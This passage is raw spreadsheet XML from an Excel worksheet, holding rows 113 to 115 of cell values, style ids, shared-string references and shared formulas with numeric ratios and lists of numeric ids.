      <c r="LR113" s="127"/>
      <c r="LS113" s="127"/>
      <c r="LT113" s="127"/>
      <c r="LU113" s="127"/>
      <c r="LV113" s="127"/>
      <c r="LW113" s="127"/>
      <c r="LX113" s="127"/>
      <c r="LY113" s="127"/>
      <c r="LZ113" s="127"/>
      <c r="MA113" s="127"/>
      <c r="MB113" s="127"/>
      <c r="MC113" s="127"/>
      <c r="MD113" s="127"/>
      <c r="ME113" s="127"/>
      <c r="MF113" s="127"/>
      <c r="MG113" s="127"/>
      <c r="MH113" s="127"/>
      <c r="MI113" s="127"/>
      <c r="MJ113" s="127"/>
      <c r="MK113" s="127"/>
      <c r="ML113" s="127"/>
      <c r="MM113" s="127"/>
      <c r="MN113" s="127"/>
      <c r="MO113" s="127"/>
      <c r="MP113" s="127"/>
      <c r="MQ113" s="127"/>
      <c r="MR113" s="127"/>
      <c r="MS113" s="127"/>
      <c r="MT113" s="127"/>
      <c r="MU113" s="127"/>
      <c r="MV113" s="127"/>
      <c r="MW113" s="127"/>
      <c r="MX113" s="127"/>
      <c r="MY113" s="127"/>
      <c r="MZ113" s="127"/>
      <c r="NA113" s="127"/>
      <c r="NB113" s="127"/>
      <c r="NC113" s="127"/>
      <c r="ND113" s="127"/>
      <c r="NE113" s="127"/>
      <c r="NF113" s="127"/>
      <c r="NG113" s="127"/>
      <c r="NH113" s="127"/>
      <c r="NI113" s="127"/>
      <c r="NJ113" s="127"/>
      <c r="NK113" s="127"/>
      <c r="NL113" s="127"/>
      <c r="NM113" s="127"/>
      <c r="NN113" s="127"/>
      <c r="NO113" s="127"/>
      <c r="NP113" s="127"/>
      <c r="NQ113" s="127"/>
      <c r="NR113" s="127"/>
      <c r="NS113" s="127"/>
      <c r="NT113" s="127"/>
      <c r="NU113" s="127"/>
      <c r="NV113" s="127"/>
      <c r="NW113" s="127"/>
      <c r="NX113" s="127"/>
      <c r="NY113" s="127"/>
    </row>
    <row r="114" ht="153.75" customHeight="1">
      <c r="B114" s="89" t="s">
        <v>558</v>
      </c>
      <c r="C114" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D114" s="90" t="s">
        <v>559</v>
      </c>
      <c r="E114" s="90" t="s">
        <v>1926</v>
      </c>
      <c r="F114" s="90" t="s">
        <v>1927</v>
      </c>
      <c r="G114" s="90" t="s">
        <v>1928</v>
      </c>
      <c r="H114" s="90" t="s">
        <v>1929</v>
      </c>
      <c r="I114" s="92" t="s">
        <v>1930</v>
      </c>
      <c r="J114" s="92" t="s">
        <v>1931</v>
      </c>
      <c r="K114" s="92" t="s">
        <v>1932</v>
      </c>
      <c r="L114" s="93" t="s">
        <v>1933</v>
      </c>
      <c r="M114" s="93">
        <v>17.0</v>
      </c>
      <c r="N114" s="93">
        <v>11.0</v>
      </c>
      <c r="O114" s="93">
        <v>0.0</v>
      </c>
      <c r="P114" s="93">
        <v>11.0</v>
      </c>
      <c r="Q114" s="93">
        <f t="shared" si="160"/>
        <v>11</v>
      </c>
      <c r="R114" s="93">
        <v>11.0</v>
      </c>
      <c r="S114" s="93">
        <v>0.0</v>
      </c>
      <c r="T114" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U114" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V114" s="96" t="s">
        <v>1934</v>
      </c>
      <c r="W114" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X114" s="97" t="s">
        <v>1935</v>
      </c>
      <c r="Y114" s="96" t="s">
        <v>1936</v>
      </c>
      <c r="Z114" s="96" t="s">
        <v>1937</v>
      </c>
      <c r="AA114" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB114" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC114" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD114" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE114" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF114" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG114" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH114" s="99" t="s">
        <v>1938</v>
      </c>
      <c r="AI114" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ114" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK114" s="100">
        <v>459.0</v>
      </c>
      <c r="AL114" s="100">
        <v>1.0</v>
      </c>
      <c r="AM114" s="100">
        <v>1.0</v>
      </c>
      <c r="AN114" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO114" s="100">
        <v>459.0</v>
      </c>
      <c r="AP114" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ114" s="100">
        <v>1.0</v>
      </c>
      <c r="AR114" s="100">
        <v>459.0</v>
      </c>
      <c r="AS114" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT114" s="100">
        <f t="shared" si="164"/>
        <v>459</v>
      </c>
      <c r="AU114" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV114" s="100">
        <v>459.0</v>
      </c>
      <c r="AW114" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX114" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY114" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ114" s="100">
        <v>0.0</v>
      </c>
      <c r="BA114" s="102">
        <v>17.0</v>
      </c>
      <c r="BB114" s="102">
        <v>0.0</v>
      </c>
      <c r="BC114" s="102">
        <v>1.0</v>
      </c>
      <c r="BD114" s="102">
        <v>1.0</v>
      </c>
      <c r="BE114" s="102">
        <v>0.0</v>
      </c>
      <c r="BF114" s="102">
        <v>0.0</v>
      </c>
      <c r="BG114" s="102">
        <v>0.0</v>
      </c>
      <c r="BH114" s="102">
        <v>0.0</v>
      </c>
      <c r="BI114" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ114" s="102">
        <v>1.0</v>
      </c>
      <c r="BK114" s="102">
        <v>1.0</v>
      </c>
      <c r="BL114" s="103">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="BM114" s="103">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BN114" s="103">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="BO114" s="103">
        <f t="shared" si="170"/>
        <v>0.09090909091</v>
      </c>
      <c r="BP114" s="103">
        <f t="shared" si="171"/>
        <v>0.09090909091</v>
      </c>
      <c r="BQ114" s="103">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="BR114" s="103">
        <f t="shared" si="173"/>
        <v>0.09090909091</v>
      </c>
      <c r="BS114" s="103">
        <f t="shared" si="174"/>
        <v>0.09090909091</v>
      </c>
      <c r="BT114" s="103">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="BU114" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV114" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW114" s="143" t="s">
        <v>1939</v>
      </c>
      <c r="BX114" s="143">
        <v>5.0</v>
      </c>
      <c r="BY114" s="143">
        <v>15.0</v>
      </c>
      <c r="BZ114" s="144" t="s">
        <v>12</v>
      </c>
      <c r="CA114" s="104" t="s">
        <v>1940</v>
      </c>
      <c r="CB114" s="104">
        <v>5.0</v>
      </c>
      <c r="CC114" s="104">
        <v>15.0</v>
      </c>
      <c r="CD114" s="104" t="s">
        <v>1941</v>
      </c>
      <c r="CE114" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF114" s="104" t="str">
        <f t="shared" si="165"/>
        <v>2025701, 2025699</v>
      </c>
      <c r="CG114" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH114" s="104" t="s">
        <v>1942</v>
      </c>
      <c r="CI114" s="104" t="s">
        <v>1943</v>
      </c>
      <c r="CJ114" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK114" s="104">
        <v>2.0</v>
      </c>
      <c r="CL114" s="104">
        <v>11.0</v>
      </c>
      <c r="CM114" s="105">
        <v>15.0</v>
      </c>
      <c r="CN114" s="105">
        <v>12.0</v>
      </c>
      <c r="CO114" s="105">
        <v>13.0</v>
      </c>
      <c r="CP114" s="105">
        <v>1.0</v>
      </c>
      <c r="CQ114" s="105">
        <v>14.0</v>
      </c>
      <c r="CR114" s="105">
        <v>15.0</v>
      </c>
      <c r="CS114" s="105">
        <v>11.0</v>
      </c>
      <c r="CT114" s="105">
        <v>0.0</v>
      </c>
      <c r="CU114" s="105">
        <v>11.0</v>
      </c>
      <c r="CV114" s="105">
        <v>11.0</v>
      </c>
      <c r="CW114" s="105">
        <v>12.0</v>
      </c>
      <c r="CX114" s="105">
        <v>13.0</v>
      </c>
      <c r="CY114" s="105">
        <v>1.0</v>
      </c>
      <c r="CZ114" s="105">
        <v>14.0</v>
      </c>
      <c r="DA114" s="105">
        <v>15.0</v>
      </c>
      <c r="DB114" s="106">
        <f t="shared" si="176"/>
        <v>1.090909091</v>
      </c>
      <c r="DC114" s="106">
        <f t="shared" si="177"/>
        <v>1.090909091</v>
      </c>
      <c r="DD114" s="106">
        <f t="shared" si="178"/>
        <v>1</v>
      </c>
      <c r="DE114" s="106">
        <f t="shared" si="179"/>
        <v>1.181818182</v>
      </c>
      <c r="DF114" s="106">
        <f t="shared" si="180"/>
        <v>1.181818182</v>
      </c>
      <c r="DG114" s="106">
        <f t="shared" si="20"/>
        <v>1</v>
      </c>
      <c r="DH114" s="106">
        <f t="shared" si="181"/>
        <v>1.363636364</v>
      </c>
      <c r="DI114" s="106">
        <f t="shared" si="182"/>
        <v>1.363636364</v>
      </c>
      <c r="DJ114" s="106">
        <f t="shared" si="183"/>
        <v>1</v>
      </c>
      <c r="DK114" s="107">
        <f t="shared" si="104"/>
        <v>1</v>
      </c>
      <c r="DL114" s="106">
        <f t="shared" si="105"/>
        <v>1</v>
      </c>
      <c r="DM114" s="108" t="s">
        <v>1944</v>
      </c>
      <c r="DN114" s="108">
        <v>8.0</v>
      </c>
      <c r="DO114" s="108">
        <v>23.0</v>
      </c>
      <c r="DP114" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ114" s="108" t="s">
        <v>1945</v>
      </c>
      <c r="DR114" s="108">
        <v>8.0</v>
      </c>
      <c r="DS114" s="108">
        <v>23.0</v>
      </c>
      <c r="DT114" s="108" t="s">
        <v>1946</v>
      </c>
      <c r="DU114" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV114" s="108" t="str">
        <f t="shared" si="166"/>
        <v>459, 44489, 2025701, 2025699, 26385</v>
      </c>
      <c r="DW114" s="108" t="s">
        <v>1947</v>
      </c>
      <c r="DX114" s="108" t="s">
        <v>1948</v>
      </c>
      <c r="DY114" s="108" t="s">
        <v>1949</v>
      </c>
      <c r="DZ114" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA114" s="108">
        <v>3.0</v>
      </c>
      <c r="EB114" s="108">
        <v>17.0</v>
      </c>
      <c r="EC114" s="109">
        <v>17.0</v>
      </c>
      <c r="ED114" s="109">
        <v>13.0</v>
      </c>
      <c r="EE114" s="109">
        <v>15.0</v>
      </c>
      <c r="EF114" s="109">
        <v>9.0</v>
      </c>
      <c r="EG114" s="109">
        <v>14.0</v>
      </c>
      <c r="EH114" s="109">
        <v>19.0</v>
      </c>
      <c r="EI114" s="109">
        <v>11.0</v>
      </c>
      <c r="EJ114" s="109">
        <v>0.0</v>
      </c>
      <c r="EK114" s="109">
        <v>11.0</v>
      </c>
      <c r="EL114" s="109">
        <v>11.0</v>
      </c>
      <c r="EM114" s="109">
        <v>13.0</v>
      </c>
      <c r="EN114" s="109">
        <v>15.0</v>
      </c>
      <c r="EO114" s="109">
        <v>9.0</v>
      </c>
      <c r="EP114" s="109">
        <v>14.0</v>
      </c>
      <c r="EQ114" s="109">
        <v>19.0</v>
      </c>
      <c r="ER114" s="110">
        <f t="shared" si="184"/>
        <v>1.181818182</v>
      </c>
      <c r="ES114" s="110">
        <f t="shared" si="185"/>
        <v>1.181818182</v>
      </c>
      <c r="ET114" s="110">
        <f t="shared" si="186"/>
        <v>1</v>
      </c>
      <c r="EU114" s="110">
        <f t="shared" si="187"/>
        <v>1.363636364</v>
      </c>
      <c r="EV114" s="110">
        <f t="shared" si="188"/>
        <v>1.363636364</v>
      </c>
      <c r="EW114" s="110">
        <f t="shared" si="189"/>
        <v>1</v>
      </c>
      <c r="EX114" s="110">
        <f t="shared" si="190"/>
        <v>1.727272727</v>
      </c>
      <c r="EY114" s="110">
        <f t="shared" si="191"/>
        <v>1.727272727</v>
      </c>
      <c r="EZ114" s="110">
        <f t="shared" si="192"/>
        <v>1</v>
      </c>
      <c r="FA114" s="110">
        <f t="shared" si="106"/>
        <v>1</v>
      </c>
      <c r="FB114" s="110">
        <f t="shared" si="107"/>
        <v>1</v>
      </c>
      <c r="FC114" s="111" t="s">
        <v>1950</v>
      </c>
      <c r="FD114" s="111">
        <v>16.0</v>
      </c>
      <c r="FE114" s="111">
        <v>31.0</v>
      </c>
      <c r="FF114" s="101" t="s">
        <v>281</v>
      </c>
      <c r="FG114" s="111" t="s">
        <v>1951</v>
      </c>
      <c r="FH114" s="111">
        <v>13.0</v>
      </c>
      <c r="FI114" s="111">
        <v>28.0</v>
      </c>
      <c r="FJ114" s="111"/>
      <c r="FK114" s="111" t="s">
        <v>281</v>
      </c>
      <c r="FL114" s="111" t="str">
        <f t="shared" si="155"/>
        <v/>
      </c>
      <c r="FM114" s="111" t="s">
        <v>1952</v>
      </c>
      <c r="FN114" s="111" t="s">
        <v>1953</v>
      </c>
      <c r="FO114" s="111" t="s">
        <v>1954</v>
      </c>
      <c r="FP114" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ114" s="111">
        <v>3.0</v>
      </c>
      <c r="FR114" s="111">
        <v>17.0</v>
      </c>
      <c r="FS114" s="112">
        <v>15.0</v>
      </c>
      <c r="FT114" s="112">
        <v>16.0</v>
      </c>
      <c r="FU114" s="112">
        <v>18.0</v>
      </c>
      <c r="FV114" s="112">
        <v>9.0</v>
      </c>
      <c r="FW114" s="112">
        <v>22.0</v>
      </c>
      <c r="FX114" s="112">
        <v>22.0</v>
      </c>
      <c r="FY114" s="112">
        <v>11.0</v>
      </c>
      <c r="FZ114" s="112">
        <v>0.0</v>
      </c>
      <c r="GA114" s="112">
        <v>11.0</v>
      </c>
      <c r="GB114" s="112">
        <v>11.0</v>
      </c>
      <c r="GC114" s="112">
        <v>15.0</v>
      </c>
      <c r="GD114" s="112">
        <v>17.0</v>
      </c>
      <c r="GE114" s="112">
        <v>9.0</v>
      </c>
      <c r="GF114" s="112">
        <v>19.0</v>
      </c>
      <c r="GG114" s="112">
        <v>19.0</v>
      </c>
      <c r="GH114" s="113">
        <f t="shared" si="193"/>
        <v>1.454545455</v>
      </c>
      <c r="GI114" s="113">
        <f t="shared" si="194"/>
        <v>1.363636364</v>
      </c>
      <c r="GJ114" s="113">
        <f t="shared" si="195"/>
        <v>1</v>
      </c>
      <c r="GK114" s="113">
        <f t="shared" si="196"/>
        <v>1.636363636</v>
      </c>
      <c r="GL114" s="113">
        <f t="shared" si="197"/>
        <v>1.545454545</v>
      </c>
      <c r="GM114" s="113">
        <f t="shared" si="198"/>
        <v>1</v>
      </c>
      <c r="GN114" s="113">
        <f t="shared" si="199"/>
        <v>2</v>
      </c>
      <c r="GO114" s="113">
        <f t="shared" si="200"/>
        <v>1.727272727</v>
      </c>
      <c r="GP114" s="113">
        <f t="shared" si="201"/>
        <v>1</v>
      </c>
      <c r="GQ114" s="114">
        <f t="shared" si="108"/>
        <v>1</v>
      </c>
      <c r="GR114" s="113">
        <f t="shared" si="109"/>
        <v>1</v>
      </c>
      <c r="GS114" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT114" s="94" t="s">
        <v>1955</v>
      </c>
      <c r="GU114" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV114" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW114" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX114" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY114" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ114" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA114" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB114" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC114" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD114" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE114" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF114" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG114" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH114" s="116" t="s">
        <v>1956</v>
      </c>
      <c r="HI114" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ114" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK114" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL114" s="93">
        <v>144.0</v>
      </c>
      <c r="HM114" s="93">
        <f t="shared" si="83"/>
        <v>3</v>
      </c>
      <c r="HN114" s="93">
        <v>0.0</v>
      </c>
      <c r="HO114" s="93">
        <v>3.0</v>
      </c>
      <c r="HP114" s="93">
        <v>3.0</v>
      </c>
      <c r="HQ114" s="118">
        <f t="shared" si="53"/>
        <v>0.2727272727</v>
      </c>
      <c r="HR114" s="118">
        <f t="shared" si="54"/>
        <v>0.2727272727</v>
      </c>
      <c r="HS114" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT114" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU114" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV114" s="119" t="s">
        <v>1957</v>
      </c>
      <c r="HW114" s="119">
        <v>2.0</v>
      </c>
      <c r="HX114" s="119">
        <v>2.0</v>
      </c>
      <c r="HY114" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ114" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA114" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB114" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC114" s="120" t="str">
        <f t="shared" ref="IC114:IC120" si="202">HV114</f>
        <v>92322, 36540</v>
      </c>
      <c r="ID114" s="120">
        <v>36540.0</v>
      </c>
      <c r="IE114" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF114" s="120">
        <v>92322.0</v>
      </c>
      <c r="IG114" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH114" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II114" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ114" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK114" s="99">
        <v>7.0</v>
      </c>
      <c r="IL114" s="99">
        <v>1.0</v>
      </c>
      <c r="IM114" s="121">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="IN114" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO114" s="98">
        <v>1.0</v>
      </c>
      <c r="IP114" s="123">
        <f t="shared" si="58"/>
        <v>0.09090909091</v>
      </c>
      <c r="IQ114" s="118">
        <f t="shared" si="59"/>
        <v>0.09090909091</v>
      </c>
      <c r="IR114" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS114" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT114" s="127"/>
      <c r="IU114" s="127"/>
      <c r="IV114" s="127"/>
      <c r="IW114" s="127"/>
      <c r="IX114" s="127"/>
      <c r="IY114" s="127"/>
      <c r="IZ114" s="127"/>
      <c r="JA114" s="127"/>
      <c r="JB114" s="127"/>
      <c r="JC114" s="127"/>
      <c r="JD114" s="127"/>
      <c r="JE114" s="127"/>
      <c r="JF114" s="127"/>
      <c r="JG114" s="127"/>
      <c r="JH114" s="127"/>
      <c r="JI114" s="127"/>
      <c r="JJ114" s="127"/>
      <c r="JK114" s="127"/>
      <c r="JL114" s="127"/>
      <c r="JM114" s="127"/>
      <c r="JN114" s="127"/>
      <c r="JO114" s="127"/>
      <c r="JP114" s="127"/>
      <c r="JQ114" s="127"/>
      <c r="JR114" s="127"/>
      <c r="JS114" s="127"/>
      <c r="JT114" s="127"/>
      <c r="JU114" s="127"/>
      <c r="JV114" s="127"/>
      <c r="JW114" s="127"/>
      <c r="JX114" s="127"/>
      <c r="JY114" s="127"/>
      <c r="JZ114" s="127"/>
      <c r="KA114" s="127"/>
      <c r="KB114" s="127"/>
      <c r="KC114" s="127"/>
      <c r="KD114" s="127"/>
      <c r="KE114" s="127"/>
      <c r="KF114" s="127"/>
      <c r="KG114" s="127"/>
      <c r="KH114" s="127"/>
      <c r="KI114" s="127"/>
      <c r="KJ114" s="127"/>
      <c r="KK114" s="127"/>
      <c r="KL114" s="127"/>
      <c r="KM114" s="127"/>
      <c r="KN114" s="127"/>
      <c r="KO114" s="127"/>
      <c r="KP114" s="127"/>
      <c r="KQ114" s="127"/>
      <c r="KR114" s="127"/>
      <c r="KS114" s="127"/>
      <c r="KT114" s="127"/>
      <c r="KU114" s="127"/>
      <c r="KV114" s="127"/>
      <c r="KW114" s="127"/>
      <c r="KX114" s="127"/>
      <c r="KY114" s="127"/>
      <c r="KZ114" s="127"/>
      <c r="LA114" s="127"/>
      <c r="LB114" s="127"/>
      <c r="LC114" s="127"/>
      <c r="LD114" s="127"/>
      <c r="LE114" s="127"/>
      <c r="LF114" s="127"/>
      <c r="LG114" s="127"/>
      <c r="LH114" s="127"/>
      <c r="LI114" s="127"/>
      <c r="LJ114" s="127"/>
      <c r="LK114" s="127"/>
      <c r="LL114" s="127"/>
      <c r="LM114" s="127"/>
      <c r="LN114" s="127"/>
      <c r="LO114" s="127"/>
      <c r="LP114" s="127"/>
      <c r="LQ114" s="127"/>
      <c r="LR114" s="127"/>
      <c r="LS114" s="127"/>
      <c r="LT114" s="127"/>
      <c r="LU114" s="127"/>
      <c r="LV114" s="127"/>
      <c r="LW114" s="127"/>
      <c r="LX114" s="127"/>
      <c r="LY114" s="127"/>
      <c r="LZ114" s="127"/>
      <c r="MA114" s="127"/>
      <c r="MB114" s="127"/>
      <c r="MC114" s="127"/>
      <c r="MD114" s="127"/>
      <c r="ME114" s="127"/>
      <c r="MF114" s="127"/>
      <c r="MG114" s="127"/>
      <c r="MH114" s="127"/>
      <c r="MI114" s="127"/>
      <c r="MJ114" s="127"/>
      <c r="MK114" s="127"/>
      <c r="ML114" s="127"/>
      <c r="MM114" s="127"/>
      <c r="MN114" s="127"/>
      <c r="MO114" s="127"/>
      <c r="MP114" s="127"/>
      <c r="MQ114" s="127"/>
      <c r="MR114" s="127"/>
      <c r="MS114" s="127"/>
      <c r="MT114" s="127"/>
      <c r="MU114" s="127"/>
      <c r="MV114" s="127"/>
      <c r="MW114" s="127"/>
      <c r="MX114" s="127"/>
      <c r="MY114" s="127"/>
      <c r="MZ114" s="127"/>
      <c r="NA114" s="127"/>
      <c r="NB114" s="127"/>
      <c r="NC114" s="127"/>
      <c r="ND114" s="127"/>
      <c r="NE114" s="127"/>
      <c r="NF114" s="127"/>
      <c r="NG114" s="127"/>
      <c r="NH114" s="127"/>
      <c r="NI114" s="127"/>
      <c r="NJ114" s="127"/>
      <c r="NK114" s="127"/>
      <c r="NL114" s="127"/>
      <c r="NM114" s="127"/>
      <c r="NN114" s="127"/>
      <c r="NO114" s="127"/>
      <c r="NP114" s="127"/>
      <c r="NQ114" s="127"/>
      <c r="NR114" s="127"/>
      <c r="NS114" s="127"/>
      <c r="NT114" s="127"/>
      <c r="NU114" s="127"/>
      <c r="NV114" s="127"/>
      <c r="NW114" s="127"/>
      <c r="NX114" s="127"/>
      <c r="NY114" s="127"/>
    </row>
    <row r="115" ht="153.75" customHeight="1">
      <c r="B115" s="89" t="s">
        <v>357</v>
      </c>
      <c r="C115" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D115" s="90" t="s">
        <v>358</v>
      </c>
      <c r="E115" s="90" t="s">
        <v>1958</v>
      </c>
      <c r="F115" s="90" t="s">
        <v>1959</v>
      </c>
      <c r="G115" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H115" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I115" s="92" t="s">
        <v>1960</v>
      </c>
      <c r="J115" s="92" t="s">
        <v>563</v>
      </c>
      <c r="K115" s="92" t="s">
        <v>1961</v>
      </c>
      <c r="L115" s="93" t="s">
        <v>399</v>
      </c>
      <c r="M115" s="93">
        <v>7.0</v>
      </c>
      <c r="N115" s="93">
        <v>1.0</v>
      </c>
      <c r="O115" s="93">
        <v>1.0</v>
      </c>
      <c r="P115" s="93">
        <v>1.0</v>
      </c>
      <c r="Q115" s="93">
        <f t="shared" si="160"/>
        <v>2</v>
      </c>
      <c r="R115" s="93">
        <v>1.0</v>
      </c>
      <c r="S115" s="93">
        <v>1.0</v>
      </c>
      <c r="T115" s="94" t="s">
        <v>1962</v>
      </c>
      <c r="U115" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V115" s="161" t="s">
        <v>810</v>
      </c>
      <c r="W115" s="96" t="s">
        <v>1963</v>
      </c>
      <c r="X115" s="132" t="s">
        <v>1964</v>
      </c>
      <c r="Y115" s="126" t="s">
        <v>1965</v>
      </c>
      <c r="Z115" s="132" t="s">
        <v>1966</v>
      </c>
      <c r="AA115" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB115" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC115" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD115" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE115" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF115" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG115" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH115" s="99" t="s">
        <v>1967</v>
      </c>
      <c r="AI115" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ115" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK115" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL115" s="100">
        <v>0.0</v>
      </c>
      <c r="AM115" s="100">
        <v>0.0</v>
      </c>
      <c r="AN115" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO115" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP115" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ115" s="100">
        <v>0.0</v>
      </c>
      <c r="AR115" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS115" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT115" s="100" t="str">
        <f t="shared" si="164"/>
        <v>-</v>
      </c>
      <c r="AU115" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV115" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW115" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX115" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY115" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ115" s="100">
        <v>0.0</v>
      </c>
      <c r="BA115" s="102">
        <v>7.0</v>
      </c>
      <c r="BB115" s="102">
        <v>0.0</v>
      </c>
      <c r="BC115" s="102">
        <v>0.0</v>
      </c>
      <c r="BD115" s="102">
        <v>0.0</v>
      </c>
      <c r="BE115" s="102">
        <v>0.0</v>
      </c>
      <c r="BF115" s="102">
        <v>0.0</v>
      </c>
      <c r="BG115" s="102">
        <v>0.0</v>
      </c>
      <c r="BH115" s="102">
        <v>0.0</v>
      </c>
      <c r="BI115" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ115" s="102">
        <v>0.0</v>
      </c>
      <c r="BK115" s="102">
        <v>0.0</v>
      </c>
      <c r="BL115" s="103">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="BM115" s="103">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BN115" s="103">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="BO115" s="103">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="BP115" s="103">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="BQ115" s="103">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="BR115" s="103">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="BS115" s="103">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="BT115" s="103">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="BU115" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV115" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW115" s="104">
        <v>2000418.0</v>
      </c>
      <c r="BX115" s="104">
        <v>1.0</v>
      </c>
      <c r="BY115" s="104">
        <v>3.0</v>
      </c>
      <c r="BZ115" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA115" s="104">
        <v>2000418.0</v>
      </c>
      <c r="CB115" s="104">
        <v>1.0</v>
      </c>
      <c r="CC115" s="104">
        <v>3.0</v>
      </c>
      <c r="CD115" s="104">
        <v>2000418.0</v>
      </c>
      <c r="CE115" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF115" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CG115" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH115" s="104">
        <v>2000418.0</v>
      </c>
      <c r="CI115" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ115" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK115" s="104">
        <v>0.0</v>
      </c>
      <c r="CL115" s="104">
        <v>0.0</v>
      </c>
      <c r="CM115" s="105">
        <v>7.0</v>
      </c>
      <c r="CN115" s="105">
        <v>2.0</v>
      </c>
      <c r="CO115" s="105">
        <v>3.0</v>
      </c>
      <c r="CP115" s="105">
        <v>0.0</v>
      </c>
